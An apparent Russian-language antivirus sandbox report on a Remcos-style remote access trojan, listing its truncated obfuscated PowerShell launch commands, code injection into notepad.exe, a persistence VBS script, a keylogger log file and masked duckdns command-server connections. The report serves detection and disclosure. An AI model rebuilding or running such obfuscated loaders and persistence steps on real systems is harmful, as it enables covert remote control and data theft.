Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gh47gh7='92^72^37^26^67^E2^46^16^07^16^47^F6^E6^C5^72^02^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^82^37^37^56^36^F6^27^07^D2^47^27^16^47^37^02^B3^85^06^54^06^94^C7^72^92^72^72^37^26^67^E2^46^16^...
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\notepad.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\notapad.vbs
- %LOCALAPPDATA%\notapad.vbs
- %APPDATA%\remcos\logs.dat
Сетевая активность
Подключается к
- 'ka##ec.com':80
- 'is######cker.duckdns.org':672
TCP
- 'is######cker.duckdns.org':672
UDP
- DNS ASK ka##ec.com
- DNS ASK is######cker.duckdns.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\notapad.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gh47gh7='92^72^37^26^67^E2^46^16^07^16^47^F6^E6^C5^72^02^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^82^37^37^56^36^F6^27^07^D2^47^27^16^47^37^02^B3^85^06^54^06^94^C7^72^92^72^72^37^26^67^E2^46^16^...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ;$QVOrxCBWGEgaaJcXyfcU='P4*PF*20*7B*24*70*P9*PE*P7*20*3D*20*74*PW*73*74*2D*P3*PF*PE*PE*PW*P3*74*P9*PF*PE*20*2D*P3*PF*PD*70*20*P7*PF*PF*P7*PC*PW*2E*P3*PF*PD*20*2D*P3*PF*7W*PE*74*20*31*20*2D*W1*7...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "%APPDATA%\notapad.vbs" "%LOCALAPPDATA%" /Y' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ;$QVOrxCBWGEgaaJcXyfcU='P4*PF*20*7B*24*70*P9*PE*P7*20*3D*20*74*PW*73*74*2D*P3*PF*PE*PE*PW*P3*74*P9*PF*PE*20*2D*P3*PF*PD*70*20*P7*PF*PF*P7*PC*PW*2E*P3*PF*PD*20*2D*P3*PF*7W*PE*74*20*31*20*2D*W1*7...
- '<SYSTEM32>\cmd.exe' /c copy "%APPDATA%\notapad.vbs" "%LOCALAPPDATA%" /Y
- '%WINDIR%\syswow64\notepad.exe'
